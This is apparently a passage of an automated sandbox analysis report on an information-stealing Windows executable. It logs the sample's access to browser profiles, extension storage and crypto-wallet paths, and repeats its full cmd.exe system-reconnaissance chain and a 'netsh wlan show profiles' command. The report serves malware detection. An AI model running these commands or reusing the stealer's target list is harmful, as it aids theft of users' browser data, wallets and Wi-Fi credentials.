            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922\cryptography\hazmat\bindings VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922\cryptography\hazmat\bindings VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922\cryptography\hazmat\bindings\_rust.pyd VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922\_cffi_backend.cp310-win_amd64.pyd VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922\cryptography\hazmat VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI12922\cryptography\hazmat VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\Temp\49flztqg VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeQueries volume information: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\AutofillStates
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\BrowserMetrics
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\CertificateRevocation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\attachments
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\reports
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crowd Deny
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\921a1560-5524-44c0-8495-fce7014dcfba
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\af
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\am
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ar
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\bg
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\bn
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ca
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\cy
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\el
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\en_CA
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\en_GB
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\en_US
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\es
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\et
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\fil
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\fr_CA
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_metadata
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_metadata
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\ff366d85-2475-4dfc-a5c6-01e0d6f59500
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDB
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\
            Source: C:\Windows\System32\netsh.exe Queries volume information: C:\
            Source: C:\Windows\System32\net1.exe Key value queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\TimeZoneInformation Bias
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Code function: 0_2_00007FF7B2B6D010 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00007FF7B2B6D010
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Code function: 0_2_00007FF7B2B85C00 _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,0_2_00007FF7B2B85C00
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Lowering of HIPS / PFW / Operating System Security Settings

            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: wireshark.exe
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: ollydbg.exe

            Stealing of Sensitive Information

            Source: Yara match File source: 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000002.00000002.2445634123.0000018B48390000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000002.00000003.2426963999.0000018B487FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000002.00000002.2447358540.0000018B49FB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000002.00000003.2426890753.0000018B47BF3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: Process Memory Space: SecuriteInfo.com.FileRepMalware.22561.28030.exe PID: 7112, type: MEMORYSTR
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File created: C:\Users\user\AppData\Local\Temp\4D802742-3099-9C0E-C19B-2A23EA1FC420\system_info.txt
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File created: C:\Users\user\AppData\Local\Temp\4D802742-3099-9C0E-C19B-2A23EA1FC420\Browsers\Cookies.txt
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File created: C:\Users\user\AppData\Local\Temp\4D802742-3099-9C0E-C19B-2A23EA1FC420\process_info.txt
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File created: C:\Users\user\AppData\Local\Temp\4D802742-3099-9C0E-C19B-2A23EA1FC420\Browsers\Firefox\History.txt
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File created: C:\Users\user\AppData\Local\Temp\4D802742-3099-9C0E-C19B-2A23EA1FC420\network_info.txt
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2446198201.0000018B48D90000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: "Electrum"
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2446198201.0000018B48D90000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: "Jaxx"
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2446198201.0000018B48D90000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: "Exodus"
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2446198201.0000018B48D90000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: "Ethereum"
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000003.2427288406.0000018B47B87000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets
            Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2446198201.0000018B48D90000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: "keystore"
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\NETSTAT.EXE netstat -ano
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\NETSTAT.EXE netstat -ano
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm\index-dir
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\pending_pings
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\to-be-removed
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\sessionstore-backups
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDB
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_mpnpojknpmmopombnjdcgaaiekajbnjb
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\921a1560-5524-44c0-8495-fce7014dcfba
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_kefjledonklijopmnomlcbpllchaibag
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.files
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.files
